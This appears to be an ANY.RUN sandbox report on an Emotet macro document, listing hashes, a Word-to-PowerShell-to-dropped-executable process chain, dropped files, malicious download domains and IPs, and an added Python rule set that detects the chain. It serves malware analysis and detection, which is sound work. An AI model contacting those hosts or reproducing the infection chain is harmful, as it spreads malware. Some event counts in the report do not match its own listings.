Sample: pINCbMITwqcpKYXFmSjr

Full analysis: https://app.any.run/tasks/d7f596c0-ceee-4711-8fad-a6a9c2385a53
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded repeatedly into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: October 09, 2019, 13:35:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Practical Concrete Hat, Subject: Bypass, Author: Linwood Moen, Keywords: Organized, Comments: functionalities, Template: Normal.dotm, Last Saved By: Roberto Howe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5: 1BC2B40D2F750E5260E00DA0123E04B2
SHA1: 96EB8C71743FF71C21673E16A41F846B0D0793FA
SHA256: 8B5DB5A8FB38B8AE91A42EF038D1A9404DC3237C57CBF208EC17CB80B3440DCD
SSDEEP: 3072:veGRyYtKgdzSrGtKyIwLx3B7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:veGRyYtKUzSSnLx3XzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process: msptermsizes.exe (PID: 2976), 178.exe (PID: 2488), 178.exe (PID: 3048), msptermsizes.exe (PID: 3036)
    • Emotet process was detected: 178.exe (PID: 3048)
  • SUSPICIOUS
    • PowerShell script executed: powershell.exe (PID: 2704)
    • Executable content was dropped or overwritten: powershell.exe (PID: 2704), 178.exe (PID: 3048)
    • Creates files in the user directory: powershell.exe (PID: 2704)
    • Starts itself from another location: 178.exe (PID: 3048)
    • Executed via WMI: powershell.exe (PID: 2704)
  • INFO
    • Creates files in the user directory: WINWORD.EXE (PID: 2832)
    • Reads settings of System Certificates: powershell.exe (PID: 2704)
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 2832)
No Malware configuration.

TRiD
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF (FlashPix)
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs: Title, 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Ortiz, Steuber and Mayer
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Roberto Howe
Template: Normal.dotm
Comments: functionalities
Keywords: Organized
Author: Linwood Moen
Subject: Bypass
Title: Practical Concrete Hat
Total processes: 40
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 0

Behavior graph

winword.exe → powershell.exe → 178.exe (PID 2488) → 178.exe (PID 3048, #EMOTET) → msptermsizes.exe (PID 2976) → msptermsizes.exe (PID 3036)

The graph labels the powershell.exe → 178.exe and 178.exe (PID 3048) → msptermsizes.exe edges "drop and start" (the parent wrote the child binary before executing it); the other edges are plain starts. The graph draws powershell.exe under winword.exe, while the process table records its direct parent as wmiprvse.exe, i.e. the macro launched it through WMI.

Process information

PID 2832  WINWORD.EXE
  CMD:             "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\pINCbMITwqcpKYXFmSjr.doc"
  Path:            C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process:  explorer.exe
  User:            admin
  Company:         Microsoft Corporation
  Integrity level: MEDIUM
  Description:     Microsoft Word
  Version:         14.0.6024.1000

PID 2704  powershell.exe
  CMD:             powershell -enco <encoded command not preserved in this copy of the report>
  Path:            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process:  wmiprvse.exe
  User:            admin
  Company:         Microsoft Corporation
  Integrity level: MEDIUM
  Description:     Windows PowerShell
  Exit code:       0
  Version:         6.1.7600.16385 (win7_rtm.090713-1255)

PID 2488  178.exe
  CMD:             "C:\Users\admin\178.exe"
  Path:            C:\Users\admin\178.exe
  Parent process:  powershell.exe
  User:            admin
  Company:         Monkey Head Software
  Integrity level: MEDIUM
  Description:     Monkey Head Media Stream
  Exit code:       0
  Version:         1, 0, 0, 1

PID 3048  178.exe  (#EMOTET)
  CMD:             --3a2e7ef0
  Path:            C:\Users\admin\178.exe
  Parent process:  178.exe
  User:            admin
  Company:         Monkey Head Software
  Integrity level: MEDIUM
  Description:     Monkey Head Media Stream
  Exit code:       0
  Version:         1, 0, 0, 1

PID 2976  msptermsizes.exe
  CMD:             "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
  Path:            C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  Parent process:  178.exe
  User:            admin
  Company:         Monkey Head Software
  Integrity level: MEDIUM
  Description:     Monkey Head Media Stream
  Exit code:       0
  Version:         1, 0, 0, 1

PID 3036  msptermsizes.exe
  CMD:             --f91b2738
  Path:            C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  Parent process:  msptermsizes.exe
  User:            admin
  Company:         Monkey Head Software
  Integrity level: MEDIUM
  Description:     Monkey Head Media Stream
  Exit code:       (still running at end of analysis)
  Version:         1, 0, 0, 1
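The process table gives the chain that the indicators above summarise: a WMI-launched PowerShell while Word is open, an executable written into the user profile and started by its dropper, a re-exec of the same binary whose whole command line is an 8-hex-digit switch, and a copy of that binary (same version resource, different path) started from %LOCALAPPDATA%. The rules below are an added example, not ANY.RUN's detection logic; they encode those indicators and run them over the six records transcribed from this report. Because the report prints only parent image names, the parent PIDs and the two `dropped_by` links are inferred from the parent column, the behavior graph and the "Executable content was dropped or overwritten" indicators, and the elided PowerShell argument is replaced by a placeholder.

```python
"""Process-tree triage rules (added example, not ANY.RUN code).

The records are transcribed from the report above. Parent PIDs and dropped_by
links are inferred (the report prints parent image names only); the PowerShell
argument that is missing from this copy of the report is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str                  # full path of the executable
    cmd: str                    # command line as recorded by the sandbox
    parent_image: str           # parent image name as recorded
    parent_pid: Optional[int]   # inferred from the chain, see module docstring
    company: str                # version-resource fields, used to spot relocated copies
    description: str
    version: str
    dropped_by: Optional[int] = None   # PID that wrote this file ("Dropped files" / indicators)


PROCS = [
    Proc(2832, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\pINCbMITwqcpKYXFmSjr.doc"',
         "explorer.exe", None, "Microsoft Corporation", "Microsoft Word", "14.0.6024.1000"),
    Proc(2704, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -enco <payload not preserved>",   # placeholder for the elided argument
         "wmiprvse.exe", None, "Microsoft Corporation", "Windows PowerShell", "6.1.7600.16385"),
    Proc(2488, r"C:\Users\admin\178.exe", r'"C:\Users\admin\178.exe"', "powershell.exe", 2704,
         "Monkey Head Software", "Monkey Head Media Stream", "1, 0, 0, 1", dropped_by=2704),
    Proc(3048, r"C:\Users\admin\178.exe", "--3a2e7ef0", "178.exe", 2488,
         "Monkey Head Software", "Monkey Head Media Stream", "1, 0, 0, 1"),
    Proc(2976, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
         r'"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"', "178.exe", 3048,
         "Monkey Head Software", "Monkey Head Media Stream", "1, 0, 0, 1", dropped_by=3048),
    Proc(3036, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe", "--f91b2738",
         "msptermsizes.exe", 2976, "Monkey Head Software", "Monkey Head Media Stream", "1, 0, 0, 1"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
USER_PROFILE = re.compile(r"^c:\\users\\[^\\]+\\", re.I)
HEX_SWITCH = re.compile(r"^--[0-9a-f]{8}$")   # the bare --3a2e7ef0 / --f91b2738 style argument


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs; each rule mirrors one indicator in the report."""
    by_pid = {p.pid: p for p in procs}
    office_alive = any(image_name(p.image) in OFFICE for p in procs)
    hits: List[Tuple[int, str]] = []
    for p in procs:
        name, parent = image_name(p.image), by_pid.get(p.parent_pid)
        # "Executed via WMI": PowerShell under wmiprvse.exe in a task that opened an Office file
        if name == "powershell.exe" and p.parent_image.lower() == "wmiprvse.exe" and office_alive:
            hits.append((p.pid, "powershell launched via WMI while Office is open"))
        # "Application was dropped or rewritten from another process": the parent wrote the binary it runs
        if p.dropped_by is not None and p.dropped_by == p.parent_pid and USER_PROFILE.match(p.image):
            hits.append((p.pid, "executable dropped into user profile and started by its dropper"))
        # "Starts itself from another location": identical version resource, different path
        if parent and (parent.company, parent.description, parent.version) == (p.company, p.description, p.version) \
                and parent.image.lower() != p.image.lower():
            hits.append((p.pid, "copy of parent started from another location"))
        # Re-exec of the same image where the whole command line is an 8-hex-digit switch
        if parent and parent.image.lower() == p.image.lower() and HEX_SWITCH.match(p.cmd.strip()):
            hits.append((p.pid, "self re-exec with 8-hex-digit switch"))
    return hits


if __name__ == "__main__":
    for pid, rule in triage(PROCS):
        print(pid, rule)
```

The same four rules translate directly to Sysmon event 1 fields (Image, ParentImage, CommandLine, plus event 11 for the dropped file); the version-resource comparison is what catches the renamed copy in %LOCALAPPDATA% even though its file name shares nothing with 178.exe.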
Total events: 1 710
Read events: 1 222
Write events: 0
Delete events: 0
Modification events: No data

Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVR6462.tmp.cvr  (type and hashes not recorded)
PID 2704  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWM1AHODWJD64VLGRFOJ.temp  (type and hashes not recorded)
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F14544B.wmf  (type: wmf)
  MD5: 49F2D0098E8993FD96825135A9945FD5
  SHA256: D5A4D4F47E10D28B85CA15B873D4475946931A311F2D036E31105FE769EF3A1B
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm  (type: pgc)
  MD5: 39FB5468FDA3B01BD0E9143BDDE1AD47
  SHA256: 393278A7DB63645C7F839369F8814CEAEDDF2A87EF1F1DF0F612F76CA6BCDF91
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83A138C7.wmf  (type: wmf)
  MD5: 4CE6C15C3432C917BB6C8CADD3199998
  SHA256: 2013AB3FC598693BC3C7D2281BBB1E265AFA9E573F9A84CFB66DBFCA3B7F37AA
PID 2704  powershell.exe  C:\Users\admin\178.exe  (type: executable)
  MD5: 537B74013A37BB5746F8F0CD9D54E7A0
  SHA256: 066D31CC0E6F45E89297334AAD69CCA12D60E9B4FE6AAD341D08BCF6BCE37C45
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D037FF91.wmf  (type: wmf)
  MD5: 90D1531819477CA9D5D7EDD1BC9B26AB
  SHA256: 102DBE2A78CCB3026CA4EDC1A138B9AB669C04797880AE77A3771E5B8427159F
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4368703.wmf  (type: wmf)
  MD5: A9E1F897BA6545097BD994AD2A9E32AD
  SHA256: 8D00ACB3ADB296B8BCF6E5925D449F436F6CD386B31B05FE2A8F3228E897D0B9
PID 2704  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms  (type: binary)
  MD5: A272B20D1454EFE23A324E582F0E701D
  SHA256: 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
PID 2832  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd  (type: tlb)
  MD5: 2550856BFB30312223D7C86BE8926334
  SHA256: 83ADCA78C6B60A6AF9835312DBBFEA52A0ECD6FAA7EABB279C5B1E1B71EB11F6
HTTP(S) requests: 0
TCP/UDP connections: 4
DNS requests: 7
Threats: 0

HTTP requests

No HTTP requests

Connections

PID   Process         IP:port             Domain             ASN               CN  Reputation
2704  powershell.exe  146.88.234.116:80   stephporn.com      PlanetHoster      FR  suspicious
2704  powershell.exe  35.238.93.185:443   e-centricity.com   (not recorded)    US  unknown
2704  powershell.exe  43.255.154.26:443   thehopeherbal.com  GoDaddy.com, LLC  SG  suspicious

DNS requests

Domain             IP               Reputation
stephporn.com      146.88.234.116   suspicious
thehopeherbal.com  43.255.154.26    suspicious
dns.msftncsi.com   131.107.255.255  shared
e-centricity.com   35.238.93.185    malicious

Threats: No threats detected

Debug info: none